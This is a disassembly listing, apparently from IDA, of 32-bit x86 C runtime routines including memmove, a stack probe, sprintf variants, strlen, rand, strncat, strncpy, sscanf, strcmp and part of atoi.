add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_418BC0
std
rep movsd
cld
jmp ds:off_418CE0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_418BC0
std
rep movsd
cld
jmp ds:off_418CE0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_418BC0
std
rep movsd
cld
jmp ds:off_418CE0[edx*4]
; ---------------------------------------------------------------------------
align 4
xchg eax, esp
mov word ptr [ecx+0], es
pushf
mov word ptr [ecx+0], es
movsb
mov word ptr [ecx+0], es
lodsb
mov word ptr [ecx+0], es
mov ah, 8Ch
inc ecx
add [esp+ecx*4+8+var_733BFFC7], bh
inc ecx
loc_418C8F: ; DATA XREF: sub_418A00+1C2�r
add bh, dl
mov word ptr [ecx+0], es
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_418CD7: ; CODE XREF: sub_418A00+1C2�j
jmp ds:off_418CE0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_418CE0 dd offset loc_418CF0 ; DATA XREF: sub_418A00+1B7�r
; sub_418A00:loc_418BE4�r ...
dd offset loc_418CF8
dd offset loc_418D08
dd offset loc_418D1C
; ---------------------------------------------------------------------------
loc_418CF0: ; CODE XREF: sub_418A00+1B7�j
; sub_418A00:loc_418BE4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418CF8: ; CODE XREF: sub_418A00+1B7�j
; sub_418A00:loc_418BE4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418D08: ; CODE XREF: sub_418A00+1B7�j
; sub_418A00:loc_418BE4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_418D1C: ; CODE XREF: sub_418A00+1B7�j
; sub_418A00:loc_418BE4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_418A00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418D40 proc near ; CODE XREF: sub_40119E+8�p
; sub_4013F1+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_418D60
loc_418D4C: ; CODE XREF: sub_418D40+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_418D4C
loc_418D60: ; CODE XREF: sub_418D40+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_418D40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418D70 proc near ; CODE XREF: sub_4013F1+47�p
; sub_4013F1+2A2�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea ecx, [ebp+arg_8]
mov [ebp+var_2C], ecx
loc_418D85: ; CODE XREF: sub_418D70+3D�j
cmp [ebp+arg_0], 0
jnz short loc_418DA9
push offset aStringNull ; "string != NULL"
push 0
push 5Dh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_418DA9
int 3 ; Trap to Debugger
loc_418DA9: ; CODE XREF: sub_418D70+19�j
; sub_418D70+36�j
xor edx, edx
test edx, edx
jnz short loc_418D85
loc_418DAF: ; CODE XREF: sub_418D70+67�j
cmp [ebp+arg_4], 0
jnz short loc_418DD3
push offset aFormatNull ; "format != NULL"
push 0
push 5Eh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_418DD3
int 3 ; Trap to Debugger
loc_418DD3: ; CODE XREF: sub_418D70+43�j
; sub_418D70+60�j
xor eax, eax
test eax, eax
jnz short loc_418DAF
mov ecx, [ebp+var_24]
mov dword ptr [ecx+0Ch], 42h
mov edx, [ebp+var_24]
mov eax, [ebp+arg_0]
mov [edx+8], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov eax, [ebp+var_24]
mov dword ptr [eax+4], 7FFFFFFFh
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+var_24]
push eax
call sub_41EA90
add esp, 0Ch
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+var_24]
mov [eax+4], edx
mov ecx, [ebp+var_24]
cmp dword ptr [ecx+4], 0
jl short loc_418E4F
mov edx, [ebp+var_24]
mov eax, [edx]
mov byte ptr [eax], 0
xor ecx, ecx
and ecx, 0FFh
mov [ebp+var_30], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_24]
mov [ecx], eax
jmp short loc_418E60
; ---------------------------------------------------------------------------
loc_418E4F: ; CODE XREF: sub_418D70+BB�j
mov edx, [ebp+var_24]
push edx
push 0
call sub_41E810
add esp, 8
mov [ebp+var_30], eax
loc_418E60: ; CODE XREF: sub_418D70+DD�j
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_418D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418E70 proc near ; CODE XREF: sub_401A3C+DA�p
; sub_401A3C+11E�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_418E90
loc_418E7C: ; CODE XREF: sub_418E70+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_418EC3
test ecx, 3
jnz short loc_418E7C
add eax, 0
loc_418E90: ; CODE XREF: sub_418E70+A�j
; sub_418E70+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_418E90
mov eax, [ecx-4]
test al, al
jz short loc_418EE1
test ah, ah
jz short loc_418ED7
test eax, 0FF0000h
jz short loc_418ECD
test eax, 0FF000000h
jz short loc_418EC3
jmp short loc_418E90
; ---------------------------------------------------------------------------
loc_418EC3: ; CODE XREF: sub_418E70+11�j
; sub_418E70+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_418ECD: ; CODE XREF: sub_418E70+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_418ED7: ; CODE XREF: sub_418E70+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_418EE1: ; CODE XREF: sub_418E70+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_418E70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418EF0 proc near ; CODE XREF: sub_401A3C+A4�p
; sub_401A3C+C9�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea ecx, [ebp+arg_C]
mov [ebp+var_2C], ecx
loc_418F05: ; CODE XREF: sub_418EF0+3D�j
cmp [ebp+arg_0], 0
jnz short loc_418F29
push offset aStringNull ; "string != NULL"
push 0
push 5Dh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_418F29
int 3 ; Trap to Debugger
loc_418F29: ; CODE XREF: sub_418EF0+19�j
; sub_418EF0+36�j
xor edx, edx
test edx, edx
jnz short loc_418F05
loc_418F2F: ; CODE XREF: sub_418EF0+67�j
cmp [ebp+arg_8], 0
jnz short loc_418F53
push offset aFormatNull ; "format != NULL"
push 0
push 5Eh
push offset aSprintf_c ; "sprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_418F53
int 3 ; Trap to Debugger
loc_418F53: ; CODE XREF: sub_418EF0+43�j
; sub_418EF0+60�j
xor eax, eax
test eax, eax
jnz short loc_418F2F
mov ecx, [ebp+var_24]
mov dword ptr [ecx+0Ch], 42h
mov edx, [ebp+var_24]
mov eax, [ebp+arg_0]
mov [edx+8], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+var_24]
push ecx
call sub_41EA90
add esp, 0Ch
mov [ebp+var_28], eax
mov edx, [ebp+var_24]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov edx, [ebp+var_24]
cmp dword ptr [edx+4], 0
jl short loc_418FCE
mov eax, [ebp+var_24]
mov ecx, [eax]
mov byte ptr [ecx], 0
xor edx, edx
and edx, 0FFh
mov [ebp+var_30], edx
mov eax, [ebp+var_24]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+var_24]
mov [edx], ecx
jmp short loc_418FDF
; ---------------------------------------------------------------------------
loc_418FCE: ; CODE XREF: sub_418EF0+BA�j
mov eax, [ebp+var_24]
push eax
push 0
call sub_41E810
add esp, 8
mov [ebp+var_30], eax
loc_418FDF: ; CODE XREF: sub_418EF0+DC�j
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_418EF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FF0 proc near ; CODE XREF: sub_403076+39�p
; sub_404C3D+2E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_41FA10
mov ecx, [ebp+arg_0]
mov [eax+14h], ecx
pop ebp
retn
sub_418FF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419000 proc near ; CODE XREF: .text:loc_4021F0�p
; sub_402D70+4D�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_41FA10
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov edx, [ebp+var_4]
mov [edx+14h], ecx
mov eax, [ebp+var_4]
mov eax, [eax+14h]
shr eax, 10h
and eax, 7FFFh
mov esp, ebp
pop ebp
retn
sub_419000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419040 proc near ; CODE XREF: sub_402853+5C�p
; sub_402853+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4190F4
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41906A
loc_41905B: ; CODE XREF: sub_419040+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_41909B
test edi, 3
jnz short loc_41905B
loc_41906A: ; CODE XREF: sub_419040+19�j
; sub_419040+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41906A
mov eax, [edi-4]
test al, al
jz short loc_4190A8
test ah, ah
jz short loc_4190A3
test eax, 0FF0000h
jz short loc_41909E
test eax, 0FF000000h
jnz short loc_41906A
loc_41909B: ; CODE XREF: sub_419040+20�j
dec edi
jmp short loc_4190AB
; ---------------------------------------------------------------------------
loc_41909E: ; CODE XREF: sub_419040+52�j
sub edi, 2
jmp short loc_4190AB
; ---------------------------------------------------------------------------
loc_4190A3: ; CODE XREF: sub_419040+4B�j
sub edi, 3
jmp short loc_4190AB
; ---------------------------------------------------------------------------
loc_4190A8: ; CODE XREF: sub_419040+47�j
sub edi, 4
loc_4190AB: ; CODE XREF: sub_419040+5C�j
; sub_419040+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_4190C0
mov ebx, ecx
shr ecx, 2
jnz short loc_41910C
jmp short loc_4190DC
; ---------------------------------------------------------------------------
loc_4190C0: ; CODE XREF: sub_419040+75�j
; sub_419040+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_4190FA
mov [edi], dl
inc edi
dec ecx
jz short loc_4190F0
test esi, 3
jnz short loc_4190C0
mov ebx, ecx
shr ecx, 2
jnz short loc_41910C
loc_4190DC: ; CODE XREF: sub_419040+7E�j
; sub_419040+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_4190F0
loc_4190E3: ; CODE XREF: sub_419040+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_4190F2
dec ecx
jnz short loc_4190E3
loc_4190F0: ; CODE XREF: sub_419040+8B�j
; sub_419040+A1�j
mov [edi], cl
loc_4190F2: ; CODE XREF: sub_419040+AB�j
pop ebx
pop esi
loc_4190F4: ; CODE XREF: sub_419040+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4190FA: ; CODE XREF: sub_419040+85�j
; sub_419040+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_419104: ; CODE XREF: sub_419040+E4�j
; sub_419040+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4190DC
loc_41910C: ; CODE XREF: sub_419040+7C�j
; sub_419040+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_419104
test dl, dl
jz short loc_4190FA
test dh, dh
jz short loc_419158
test edx, 0FF0000h
jz short loc_419148
test edx, 0FF000000h
jnz short loc_419104
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_419148: ; CODE XREF: sub_419040+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_419158: ; CODE XREF: sub_419040+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_419040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419170 proc near ; CODE XREF: sub_402994+2A2�p
; sub_40C50A+31EB�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_419191
xor eax, eax
jmp short loc_419193
; ---------------------------------------------------------------------------
loc_419191: ; CODE XREF: sub_419170+1B�j
mov eax, edi
loc_419193: ; CODE XREF: sub_419170+1F�j
cld
pop edi
leave
retn
sub_419170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4191A0 proc near ; CODE XREF: sub_402994+6E�p
; sub_402994+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_419223
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4191C4
shr ecx, 2
jnz short loc_419231
jmp short loc_4191E5
; ---------------------------------------------------------------------------
loc_4191C4: ; CODE XREF: sub_4191A0+1B�j
; sub_4191A0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_4191F2
test al, al
jz short loc_4191FA
test esi, 3
jnz short loc_4191C4
mov ebx, ecx
shr ecx, 2
jnz short loc_419231
loc_4191E0: ; CODE XREF: sub_4191A0+8F�j
and ebx, 3
jz short loc_4191F2
loc_4191E5: ; CODE XREF: sub_4191A0+22�j
; sub_4191A0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_41921E
dec ebx
jnz short loc_4191E5
loc_4191F2: ; CODE XREF: sub_4191A0+2B�j
; sub_4191A0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4191FA: ; CODE XREF: sub_4191A0+2F�j
test edi, 3
jz short loc_419214
loc_419202: ; CODE XREF: sub_4191A0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_419296
test edi, 3
jnz short loc_419202
loc_419214: ; CODE XREF: sub_4191A0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_419287
loc_41921B: ; CODE XREF: sub_4191A0+7F�j
; sub_4191A0+F4�j
mov [edi], al
inc edi
loc_41921E: ; CODE XREF: sub_4191A0+4D�j
dec ebx
jnz short loc_41921B
pop ebx
pop esi
loc_419223: ; CODE XREF: sub_4191A0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_419229: ; CODE XREF: sub_4191A0+A9�j
; sub_4191A0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4191E0
loc_419231: ; CODE XREF: sub_4191A0+20�j
; sub_4191A0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_419229
test dl, dl
jz short loc_41927B
test dh, dh
jz short loc_419271
test edx, 0FF0000h
jz short loc_419267
test edx, 0FF000000h
jnz short loc_419229
mov [edi], edx
jmp short loc_41927F
; ---------------------------------------------------------------------------
loc_419267: ; CODE XREF: sub_4191A0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41927F
; ---------------------------------------------------------------------------
loc_419271: ; CODE XREF: sub_4191A0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41927F
; ---------------------------------------------------------------------------
loc_41927B: ; CODE XREF: sub_4191A0+AD�j
xor edx, edx
mov [edi], edx
loc_41927F: ; CODE XREF: sub_4191A0+C5�j
; sub_4191A0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_419291
loc_419287: ; CODE XREF: sub_4191A0+79�j
xor eax, eax
loc_419289: ; CODE XREF: sub_4191A0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_419289
loc_419291: ; CODE XREF: sub_4191A0+E5�j
and ebx, 3
jnz short loc_41921B
loc_419296: ; CODE XREF: sub_4191A0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4191A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192A0 proc near ; CODE XREF: sub_402D70+40�p
; sub_406614+274�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea ecx, [ebp+arg_8]
mov [ebp+var_2C], ecx
loc_4192B5: ; CODE XREF: sub_4192A0+3D�j
cmp [ebp+arg_0], 0
jnz short loc_4192D9
push offset aStringNull ; "string != NULL"
push 0
push 42h
push offset aSscanf_c ; "sscanf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_4192D9
int 3 ; Trap to Debugger
loc_4192D9: ; CODE XREF: sub_4192A0+19�j
; sub_4192A0+36�j
xor edx, edx
test edx, edx
jnz short loc_4192B5
loc_4192DF: ; CODE XREF: sub_4192A0+67�j
cmp [ebp+arg_4], 0
jnz short loc_419303
push offset aFormatNull ; "format != NULL"
push 0
push 43h
push offset aSscanf_c ; "sscanf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419303
int 3 ; Trap to Debugger
loc_419303: ; CODE XREF: sub_4192A0+43�j
; sub_4192A0+60�j
xor eax, eax
test eax, eax
jnz short loc_4192DF
mov ecx, [ebp+var_24]
mov dword ptr [ecx+0Ch], 49h
mov edx, [ebp+var_24]
mov eax, [ebp+arg_0]
mov [edx+8], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov eax, [ebp+arg_0]
push eax
call sub_418E70
add esp, 4
mov ecx, [ebp+var_24]
mov [ecx+4], eax
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_24]
push ecx
call sub_41FBE0
add esp, 0Ch
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4192A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419360 proc near ; CODE XREF: sub_4034E9+1D�p
; sub_404CEF+FC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_4193AC
loc_419370: ; CODE XREF: sub_419360+3C�j
; sub_419360+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_4193A4
or al, al
jz short loc_4193A0
cmp ah, [ecx+1]
jnz short loc_4193A4
or ah, ah
jz short loc_4193A0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_4193A4
or al, al
jz short loc_4193A0
cmp ah, [ecx+3]
jnz short loc_4193A4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_419370
mov edi, edi
loc_4193A0: ; CODE XREF: sub_419360+18�j
; sub_419360+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4193A4: ; CODE XREF: sub_419360+14�j
; sub_419360+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4193AC: ; CODE XREF: sub_419360+E�j
test edx, 1
jz short loc_4193C8
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_4193A4
inc ecx
or al, al
jz short loc_4193A0
test edx, 2
jz short loc_419370
loc_4193C8: ; CODE XREF: sub_419360+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_4193A4
or al, al
jz short loc_4193A0
cmp ah, [ecx+1]
jnz short loc_4193A4
or ah, ah
jz short loc_4193A0
add ecx, 2
jmp short loc_419370
sub_419360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193F0 proc near ; CODE XREF: sub_403655+19�p
; sub_4083E7+1C�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
loc_4193FF: ; CODE XREF: sub_4193F0+37�j
cmp [ebp+arg_0], 0
jnz short loc_419423
push offset aStringNull ; "string != NULL"
push 0
push 5Ah
push offset aVsprintf_c ; "vsprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_419423
int 3 ; Trap to Debugger
loc_419423: ; CODE XREF: sub_4193F0+13�j
; sub_4193F0+30�j
xor ecx, ecx
test ecx, ecx
jnz short loc_4193FF
loc_419429: ; CODE XREF: sub_4193F0+61�j
cmp [ebp+arg_8], 0
jnz short loc_41944D
push offset aFormatNull ; "format != NULL"
push 0
push 5Bh
push offset aVsprintf_c ; "vsprintf.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_41944D
int 3 ; Trap to Debugger
loc_41944D: ; CODE XREF: sub_4193F0+3D�j
; sub_4193F0+5A�j
xor edx, edx
test edx, edx
jnz short loc_419429
mov eax, [ebp+var_24]
mov dword ptr [eax+0Ch], 42h
mov ecx, [ebp+var_24]
mov edx, [ebp+arg_0]
mov [ecx+8], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_24]
mov eax, [ebp+arg_4]
mov [edx+4], eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+var_24]
push eax
call sub_41EA90
add esp, 0Ch
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+var_24]
mov [eax+4], edx
mov ecx, [ebp+var_24]
cmp dword ptr [ecx+4], 0
jl short loc_4194C8
mov edx, [ebp+var_24]
mov eax, [edx]
mov byte ptr [eax], 0
xor ecx, ecx
and ecx, 0FFh
mov [ebp+var_2C], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+var_24]
mov [ecx], eax
jmp short loc_4194D9
; ---------------------------------------------------------------------------
loc_4194C8: ; CODE XREF: sub_4193F0+B4�j
mov edx, [ebp+var_24]
push edx
push 0
call sub_41E810
add esp, 8
mov [ebp+var_2C], eax
loc_4194D9: ; CODE XREF: sub_4193F0+D6�j
mov eax, [ebp+var_28]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4193F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4194F0 proc near ; CODE XREF: sub_4195F0+7�p
; sub_42B610+8F�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
loc_4194F6: ; CODE XREF: sub_4194F0+4E�j
cmp dword_442F58, 1
jle short loc_419516
push 8
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_10], eax
jmp short loc_41952F
; ---------------------------------------------------------------------------
loc_419516: ; CODE XREF: sub_4194F0+D�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8
mov [ebp+var_10], edx
loc_41952F: ; CODE XREF: sub_4194F0+24�j
cmp [ebp+var_10], 0
jz short loc_419540
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_4194F6
; ---------------------------------------------------------------------------
loc_419540: ; CODE XREF: sub_4194F0+43�j
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, [ecx]
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+var_4]
mov [ebp+var_C], ecx
cmp [ebp+var_4], 2Dh
jz short loc_419565
cmp [ebp+var_4], 2Bh
jnz short loc_419578
loc_419565: ; CODE XREF: sub_4194F0+6D�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_419578: ; CODE XREF: sub_4194F0+73�j
mov [ebp+var_8], 0
loc_41957F: ; CODE XREF: sub_4194F0+E9�j
cmp dword_442F58, 1
jle short loc_41959B
push 4
mov edx, [ebp+var_4]
push edx
call sub_41E750
add esp, 8
mov [ebp+var_14], eax
jmp short loc_4195B0
; ---------------------------------------------------------------------------
loc_41959B: ; CODE XREF: sub_4194F0+96�j
mov eax, [ebp+var_4]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_14], edx
loc_4195B0: ; CODE XREF: sub_4194F0+A9�j
